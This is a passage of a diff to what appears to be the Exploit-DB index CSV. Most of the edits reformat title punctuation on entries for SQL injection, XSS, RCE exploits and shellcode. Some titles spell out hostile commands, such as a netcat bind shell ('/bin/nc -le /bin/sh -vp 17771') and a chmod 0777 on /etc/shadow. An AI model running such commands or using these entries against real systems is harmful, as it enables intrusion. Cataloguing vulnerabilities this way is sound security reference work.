reportid Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36315,platforms/php/webapps/36315.txt,"webERP <= 4.3.8 reportwriter/FormMaker.php ReportID Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross Site Scripting Vulnerability",2011-11-17,"James webb",php,webapps,0 -36317,platforms/php/webapps/36317.txt,"WordPress Flexible Custom Post Type plugin 'id' Parameter Cross Site Scripting Vulnerability",2011-11-17,Am!r,php,webapps,0 +36317,platforms/php/webapps/36317.txt,"WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross Site Scripting Vulnerability",2011-11-17,Am!r,php,webapps,0 36318,platforms/windows/remote/36318.txt,"Jetty Web Server Directory Traversal Vulnerability",2011-11-18,"Alexey Sintsov",windows,remote,0 36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 'goform/formTest' Multiple Cross Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0 36320,platforms/php/webapps/36320.txt,"Codoforum 2.5.1 - Arbitrary File Download",2015-03-10,"Kacper Szurek",php,webapps,80 36321,platforms/php/webapps/36321.txt,"GeniXCMS 0.0.1 - Multiple Vulnerabilities",2015-03-10,LiquidWorm,php,webapps,80 36322,platforms/php/webapps/36322.txt,"Digital Attic Foundation CMS 'id' Parameter SQL Injection Vulnerability",2011-11-20,tempe_mendoan,php,webapps,0 -36323,platforms/php/webapps/36323.txt,"WordPress Alert Before Your Post Plugin 'name' Parameter Cross Site Scripting Vulnerability",2011-11-21,Am!r,php,webapps,0 -36324,platforms/php/webapps/36324.txt,"WordPress Advanced Text Widget Plugin 2.0 'page' Parameter Cross Site Scripting Vulnerability",2011-11-21,Amir,php,webapps,0 -36325,platforms/php/webapps/36325.txt,"WordPress Adminimize Plugin 1.7.21 'page' Parameter Cross Site Scripting Vulnerability",2011-11-21,Am!r,php,webapps,0 -36326,platforms/php/webapps/36326.txt,"WordPress Lanoba Social Plugin 1.0 'action' Parameter Cross Site Scripting Vulnerability",2011-11-21,Amir,php,webapps,0 +36323,platforms/php/webapps/36323.txt,"WordPress Alert Before Your Post Plugin - 'name' Parameter Cross Site Scripting Vulnerability",2011-11-21,Am!r,php,webapps,0 +36324,platforms/php/webapps/36324.txt,"WordPress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross Site Scripting Vulnerability",2011-11-21,Amir,php,webapps,0 +36325,platforms/php/webapps/36325.txt,"WordPress Adminimize Plugin 1.7.21 - 'page' Parameter Cross Site Scripting Vulnerability",2011-11-21,Am!r,php,webapps,0 +36326,platforms/php/webapps/36326.txt,"WordPress Lanoba Social Plugin 1.0 - 'action' Parameter Cross Site Scripting Vulnerability",2011-11-21,Amir,php,webapps,0 36327,platforms/windows/dos/36327.txt,"Microsoft Windows XP/7 Kernel 'Win32k.sys' Keyboard Layout Local Privilege Escalation Vulnerability",2011-11-22,instruder,windows,dos,0 36328,platforms/php/webapps/36328.txt,"TA.CMS (TeachArabia) index.php id Parameter SQL Injection",2011-11-22,CoBRa_21,php,webapps,0 36329,platforms/php/webapps/36329.txt,"TA.CMS (TeachArabia) lang Parameter Traversal Local File Inclusion",2011-11-22,CoBRa_21,php,webapps,0 @@ -32769,7 +32769,7 @@ id,file,description,date,author,platform,type,port 36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 36337,platforms/linux/remote/36337.py,"ElasticSearch Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200 -36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 +36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 @@ -32792,7 +32792,7 @@ id,file,description,date,author,platform,type,port 36358,platforms/php/webapps/36358.html,"CS-Cart 4.2.4 - CSRF",2015-03-11,"Luis Santana",php,webapps,0 36359,platforms/lin_x86-64/shellcode/36359.c,"Reads Data From /etc/passwd To /tmp/outfile (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0 36360,platforms/windows/remote/36360.rb,"Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free",2015-03-12,metasploit,windows,remote,0 -36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 'APPE' Command Remote Denial Of Service Vulnerability",2011-11-25,"Houssam Sahli",windows,dos,0 +36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Command Remote Denial Of Service Vulnerability",2011-11-25,"Houssam Sahli",windows,dos,0 36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 Multiple Cross Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0 36363,platforms/php/webapps/36363.txt,"WordPress Skysa App Bar Plugin 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-28,Amir,php,webapps,0 36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0 @@ -32822,11 +32822,11 @@ id,file,description,date,author,platform,type,port 36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash PoC",2015-03-16,"Avinash Thapa",linux,local,0 36406,platforms/php/webapps/36406.txt,"Elxis CMS 2009 index.php task Parameter XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0 36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0 -36391,platforms/lin_x86/shellcode/36391.c,"linux/x86 - ROT13 encoded execve(""/bin/sh"") (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36391,platforms/lin_x86/shellcode/36391.c,"linux/x86 - ROT13 encoded execve(_/bin/sh_) (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36392,platforms/windows/dos/36392.txt,"Intel Network Adapter Diagnostic Driver - IOCTL Handling Vulnerability",2015-03-14,"Glafkos Charalambous ",windows,dos,0 36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow obfuscated (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36394,platforms/lin_x86/shellcode/36394.c,"linux/x86 - Obfuscated - map google.com to 127.1.1.1 (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36395,platforms/lin_x86/shellcode/36395.c,"linux/x86 - Obfuscated execve(""/bin/sh"") (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36395,platforms/lin_x86/shellcode/36395.c,"linux/x86 - Obfuscated execve(_/bin/sh_) (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting Vulnerability",2011-12-31,6Scan,php,webapps,0 36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - TCP Bind Shell (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 @@ -32887,7 +32887,7 @@ id,file,description,date,author,platform,type,port 36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 pub/clients.php login[] Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0 36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 index.php login[] Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0 36455,platforms/multiple/remote/36455.txt,"Nagios XI Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2011-12-14,anonymous,multiple,remote,0 -36456,platforms/php/webapps/36456.txt,"Owl Intranet Engine 1.00 'userid' Parameter Authentication Bypass Vulnerability",2011-12-15,"RedTeam Pentesting GmbH",php,webapps,0 +36456,platforms/php/webapps/36456.txt,"Owl Intranet Engine 1.00 - 'userid' Parameter Authentication Bypass Vulnerability",2011-12-15,"RedTeam Pentesting GmbH",php,webapps,0 36457,platforms/cgi/webapps/36457.txt,"Websense 7.6 Triton Report Management Interface Cross Site Scripting Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0 36458,platforms/cgi/webapps/36458.txt,"Websense 7.6 Triton 'ws_irpt.exe' Remote Command Execution Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0 36459,platforms/cgi/webapps/36459.txt,"Websense 7.6 Products 'favorites.exe' Authentication Bypass Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0 @@ -32903,14 +32903,14 @@ id,file,description,date,author,platform,type,port 36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware <= 8.1 'show_errors' Parameter HTML Injection Vulnerability",2011-12-20,"Stefan Schurtz",php,webapps,0 36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-12-20,"High-Tech Bridge SA",php,webapps,0 36472,platforms/php/webapps/36472.txt,"Joomla! 'com_caproductprices' Component 'id' Parameter SQL Injection Vulnerability",2011-12-20,CoBRa_21,php,webapps,0 -36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 'tableid' Parameter SQL Injection Vulnerability",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0 +36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' Parameter SQL Injection Vulnerability",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0 36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0 36475,platforms/hardware/remote/36475.txt,"Barracuda Control Center 620 Cross Site Scripting and HTML Injection Vulnerabilities",2011-12-21,Vulnerability-Lab,hardware,remote,0 36476,platforms/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus '.cfg' File Memory Corruption Vulnerability",2011-12-21,"Vulnerability Research Laboratory",windows,local,0 36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0 36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Shell Upload Vulnerability",2015-03-24,KedAns-Dz,php,webapps,0 36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0 -36487,platforms/php/webapps/36487.txt,"WordPress Comment Rating Plugin 2.9.20 'path' Parameter Cross Site Scripting Vulnerability",2012-01-03,"The Evil Thinker",php,webapps,0 +36487,platforms/php/webapps/36487.txt,"WordPress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross Site Scripting Vulnerability",2012-01-03,"The Evil Thinker",php,webapps,0 36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 'domain' Parameter Cross Site Scripting Vulnerability",2012-01-03,Atmon3r,php,webapps,0 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0 36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0 @@ -32934,7 +32934,7 @@ id,file,description,date,author,platform,type,port 36509,platforms/php/webapps/36509.txt,"SQLiteManager 1.2.4 main.php dbsel Parameter XSS",2012-01-05,"Stefan Schurtz",php,webapps,0 36510,platforms/php/webapps/36510.txt,"SQLiteManager 1.2.4 index.php Multiple Parameter XSS",2012-01-05,"Stefan Schurtz",php,webapps,0 36511,platforms/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 HTML Injection Vulnerability",2012-12-27,"Vulnerability Research Laboratory",hardware,remote,0 -36512,platforms/php/webapps/36512.txt,"eFront 3.6.10 'download' Parameter Directory Traversal Vulnerability",2012-01-06,"Chokri B.A",php,webapps,0 +36512,platforms/php/webapps/36512.txt,"eFront 3.6.10 - 'download' Parameter Directory Traversal Vulnerability",2012-01-06,"Chokri B.A",php,webapps,0 36513,platforms/windows/remote/36513.txt,"IpTools 0.1.4 Tiny TCP/IP servers Directory Traversal Vulnerability",2012-01-06,demonalex,windows,remote,0 36514,platforms/windows/remote/36514.pl,"IPtools 0.1.4 Remote Command Server Buffer Overflow Vulnerability",2012-01-06,demonalex,windows,remote,0 36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 Cross Site Scripting and SQL Injection Vulnerabilities",2012-01-07,"BHG Security Center",asp,webapps,0 @@ -33004,7 +33004,7 @@ id,file,description,date,author,platform,type,port 36582,platforms/php/webapps/36582.txt,"OneOrZero AIMS 'index.php' Cross Site Scripting Vulnerability",2012-01-18,"High-Tech Bridge SA",php,webapps,0 36583,platforms/php/webapps/36583.txt,"PostNuke pnAddressbook Module 'id' Parameter SQL Injection Vulnerability",2012-01-19,"Robert Cooper",php,webapps,0 36584,platforms/php/webapps/36584.txt,"Vastal EzineShop 'view_mags.php' SQL Injection Vulnerability",2012-01-19,Lazmania61,php,webapps,0 -36585,platforms/asp/webapps/36585.txt,"Snitz Forums 2000 'TOPIC_ID' Parameter SQL Injection Vulnerability",2012-01-20,snup,asp,webapps,0 +36585,platforms/asp/webapps/36585.txt,"Snitz Forums 2000 - 'TOPIC_ID' Parameter SQL Injection Vulnerability",2012-01-20,snup,asp,webapps,0 36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0 36587,platforms/windows/remote/36587.py,"Savant Web Server 3.1 Remote Buffer Overflow Vulnerability",2012-01-21,red-dragon,windows,remote,0 36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 Multiple Cross Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0 @@ -33018,10 +33018,10 @@ id,file,description,date,author,platform,type,port 36596,platforms/php/webapps/36596.txt,"Joomla! 'com_some' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0 36597,platforms/php/webapps/36597.txt,"Joomla! 'com_bulkenquery' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0 36598,platforms/php/webapps/36598.txt,"Joomla! 'com_kp' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36599,platforms/asp/webapps/36599.txt,"Raven 1.0 'connector.asp' Arbitrary File Upload Vulnerability",2012-01-21,HELLBOY,asp,webapps,0 +36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload Vulnerability",2012-01-21,HELLBOY,asp,webapps,0 36600,platforms/php/webapps/36600.txt,"Wordpress Business Intelligence Plugin - SQL injection",2015-04-02,"Jagriti Sahu",php,webapps,80 36601,platforms/php/webapps/36601.txt,"Joomla Spider Random Article Component - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 -36620,platforms/php/webapps/36620.txt,"WordPress YouSayToo auto-publishing Plugin 1.0 'submit' Parameter Cross Site Scripting Vulnerability",2012-01-24,"H4ckCity Security Team",php,webapps,0 +36620,platforms/php/webapps/36620.txt,"WordPress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross Site Scripting Vulnerability",2012-01-24,"H4ckCity Security Team",php,webapps,0 36602,platforms/windows/remote/36602.html,"Webgate WESP SDK 1.2 ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36603,platforms/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36604,platforms/windows/remote/36604.html,"WebGate WinRDS 2.0.8 PlaySiteAllChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 @@ -33084,7 +33084,7 @@ id,file,description,date,author,platform,type,port 36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 'export' Parameter Cross Site Scripting Vulnerability",2012-02-07,"Infoserve Security Team",php,webapps,0 36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 DomainConfig.do operation Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0 36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 jsp/AddDC.jsp domainName Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0 -36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 'administrator.php' Cross Site Scripting Vulnerability",2012-02-07,"Chokri B.A",php,webapps,0 +36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross Site Scripting Vulnerability",2012-02-07,"Chokri B.A",php,webapps,0 36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial Of Service Vulnerability",2012-01-05,"Moritz Muehlenhoff",linux,dos,0 36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0 36671,platforms/php/webapps/36671.txt,"WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability",2015-04-08,"Claudio Viviani",php,webapps,80 @@ -33158,12 +33158,12 @@ id,file,description,date,author,platform,type,port 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0 36743,platforms/linux/dos/36743.c,"Linux Kernel splice() System Call - Local DoS",2015-04-13,"Emeric Nasi",linux,dos,0 36744,platforms/windows/remote/36744.rb,"Adobe Flash Player casi32 Integer Overflow",2015-04-13,metasploit,windows,remote,0 -36745,platforms/osx/local/36745.rb,"Mac OS X ""Rootpipe"" Privilege Escalation",2015-04-13,metasploit,osx,local,0 +36745,platforms/osx/local/36745.rb,"Mac OS X _Rootpipe_ Privilege Escalation",2015-04-13,metasploit,osx,local,0 36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_sensor.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_uaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36751,platforms/php/webapps/36751.txt,"Wordpress Video Gallery 2.8 - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80 -36750,platforms/lin_x86-64/shellcode/36750.c,"linux/x86 setreuid(0_ 0) + execve(""/sbin/halt"") + exit(0) (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86-64,shellcode,0 +36750,platforms/lin_x86-64/shellcode/36750.c,"linux/x86 setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86-64,shellcode,0 36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_user.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36756,platforms/windows/remote/36756.html,"Samsung iPOLiS ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0 36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 @@ -33186,8 +33186,8 @@ id,file,description,date,author,platform,type,port 36807,platforms/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",php,webapps,80 36776,platforms/windows/dos/36776.py,"MS Windows (HTTP.sys) - HTTP Request Parsing DoS (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 36777,platforms/php/webapps/36777.txt,"Wordpress Ajax Store Locator 1.2 - SQL Injection Vulnerability",2015-04-16,"Claudio Viviani",php,webapps,80 -36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 execve ""/bin/sh"" - shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0 -36779,platforms/win32/shellcode/36779.c,"win32/xp sp3 Create (""file.txt"") (83 bytes)",2015-04-17,"TUNISIAN CYBER",win32,shellcode,0 +36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 execve _/bin/sh_ - shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0 +36779,platforms/win32/shellcode/36779.c,"win32/xp sp3 Create (_file.txt_) (83 bytes)",2015-04-17,"TUNISIAN CYBER",win32,shellcode,0 36780,platforms/win32/shellcode/36780.c,"win32/xp sp3 - Restart computer",2015-04-17,"TUNISIAN CYBER",win32,shellcode,0 36781,platforms/lin_x86/shellcode/36781.py,"Linux custom execve-shellcode Encoder/Decoder",2015-04-17,"Konstantinos Alexiou",lin_x86,shellcode,0 36782,platforms/linux/local/36782.sh,"Apport - Local Linux Root",2015-04-17,"Ricardo F. Teixeira",linux,local,0 @@ -33277,7 +33277,7 @@ id,file,description,date,author,platform,type,port 36875,platforms/php/webapps/36875.txt,"Chyrp 2.1.2 includes/error.php body Parameter XSS",2012-02-22,"High-Tech Bridge SA",php,webapps,0 36876,platforms/php/webapps/36876.txt,"Oxwall 1.1.1 'plugin' Parameter Cross Site Scripting Vulnerability",2012-02-22,Ariko-Security,php,webapps,0 36877,platforms/hardware/remote/36877.html,"Multiple D-Link DCS Products 'security.cgi' Cross-Site Request Forgery Vulnerability",2012-02-23,"Rigan Iimrigan",hardware,remote,0 -36878,platforms/php/webapps/36878.txt,"Mobile Mp3 Search Script 2.0 'dl.php' HTTP Response Splitting Vulnerability",2012-02-23,"Corrado Liotta",php,webapps,0 +36878,platforms/php/webapps/36878.txt,"Mobile Mp3 Search Script 2.0 - 'dl.php' HTTP Response Splitting Vulnerability",2012-02-23,"Corrado Liotta",php,webapps,0 36880,platforms/windows/remote/36880.rb,"Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory",2015-05-01,metasploit,windows,remote,0 36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0 36882,platforms/php/webapps/36882.txt,"MyJobList 0.1.3 'eid' Parameter SQL Injection Vulnerability",2012-02-26,"Red Security TEAM",php,webapps,0 @@ -33290,7 +33290,7 @@ id,file,description,date,author,platform,type,port 36889,platforms/php/webapps/36889.txt,"Dotclear 2.4.1.2 /admin/blogs.php nb Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36890,platforms/php/webapps/36890.txt,"Dotclear 2.4.1.2 /admin/comments.php Multiple Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 /admin/plugin.php page Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 -36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 'main.php' Cross Site Request Forgery Vulnerability",2012-02-29,"Green Hornet",php,webapps,0 +36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 - 'main.php' Cross Site Request Forgery Vulnerability",2012-02-29,"Green Hornet",php,webapps,0 36893,platforms/php/webapps/36893.txt,"Fork CMS 3.x private/en/locale/index name Parameter XSS",2012-02-28,anonymous,php,webapps,0 36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x backend/modules/error/actions/index.php parse() Function Multiple Parameter Error Display XSS",2012-02-28,anonymous,php,webapps,0 36895,platforms/php/webapps/36895.txt,"starCMS 'q' Parameter URI Cross Site Scripting Vulnerability",2012-03-02,Am!r,php,webapps,0 @@ -33301,7 +33301,7 @@ id,file,description,date,author,platform,type,port 36900,platforms/php/webapps/36900.txt,"Etano 1.20/1.22 photo_view.php return Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 36914,platforms/php/webapps/36914.txt,"Fork CMS 3.2.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-06,"Gjoko Krstic",php,webapps,0 36915,platforms/windows/remote/36915.txt,"NetDecision 4.6.1 Multiple Directory Traversal Vulnerabilities",2012-03-07,"Luigi Auriemma",windows,remote,0 -36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 'src' Parameter SQL Injection Vulnerability",2012-03-07,"Rob Miller",php,webapps,0 +36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 - 'src' Parameter SQL Injection Vulnerability",2012-03-07,"Rob Miller",php,webapps,0 36917,platforms/php/webapps/36917.txt,"OSClass 2.3.x Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-03-07,"Filippo Cavallarin",php,webapps,0 36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (MSF)",2015-05-04,"TUNISIAN CYBER",windows,local,0 36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x 'select_users_template' Parameter Local File Include Vulnerability",2012-03-05,"Aung Khant",php,webapps,0 @@ -33310,7 +33310,7 @@ id,file,description,date,author,platform,type,port 36913,platforms/php/webapps/36913.pl,"Joomla! 'redirect.php' SQL Injection Vulnerability",2012-03-05,"Colin Wong",php,webapps,0 36903,platforms/ios/dos/36903.txt,"Grindr 2.1.1 iOS - Denial of Service",2015-05-04,Vulnerability-Lab,ios,dos,0 36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - File Include Web Vulnerability",2015-05-04,Vulnerability-Lab,ios,webapps,0 -36973,platforms/php/webapps/36973.txt,"Gnuboard 4.34.20 'download.php' HTML Injection Vulnerability",2012-03-20,wh1ant,php,webapps,0 +36973,platforms/php/webapps/36973.txt,"Gnuboard 4.34.20 - 'download.php' HTML Injection Vulnerability",2012-03-20,wh1ant,php,webapps,0 36920,platforms/windows/local/36920.py,"Mediacoder 0.8.34.5716 - Buffer Overflow SEH Exploit (.m3u)",2015-05-06,evil_comrade,windows,local,0 36921,platforms/lin_x86/shellcode/36921.c,"Linux x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode (58 Bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0 36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - File Include Web Vulnerability",2015-05-06,Vulnerability-Lab,ios,webapps,0 @@ -33320,7 +33320,7 @@ id,file,description,date,author,platform,type,port 36965,platforms/php/webapps/36965.txt,"Omnistar Live Cross Site Scripting and SQL Injection Vulnerabilities",2012-03-13,sonyy,php,webapps,0 36966,platforms/linux/local/36966.txt,"LightDM 1.0.6 Arbitrary File Deletion Vulnerability",2012-03-13,"Ryan Lortie",linux,local,0 36967,platforms/php/webapps/36967.txt,"Max's Guestbook 1.0 Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps,0 -36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 'id' Parameter Local File Include Vulnerability",2012-03-14,n0tch,php,webapps,0 +36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Parameter Local File Include Vulnerability",2012-03-14,n0tch,php,webapps,0 36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 Licensing Administration Console Denial of Service Vulnerability",2012-03-15,Rune,windows,dos,0 36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 'page2' Parameter SQL Injection Vulnerability",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 'userId' Parameter Cross Site Scripting Vulnerability",2012-03-18,sonyy,java,webapps,0 @@ -33346,7 +33346,7 @@ id,file,description,date,author,platform,type,port 36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin <= 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal Vulnerability",2015-05-07,Vulnerability-Lab,ios,webapps,0 36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 'photo_one.php' Script Cross Site Scripting Vulnerability",2012-03-12,"Simon Ganiere",php,webapps,0 -36945,platforms/hardware/remote/36945.txt,"TP-LINK TL-WR740N 111130 'ping_addr' Parameter HTML Injection Vulnerability",2012-03-12,l20ot,hardware,remote,0 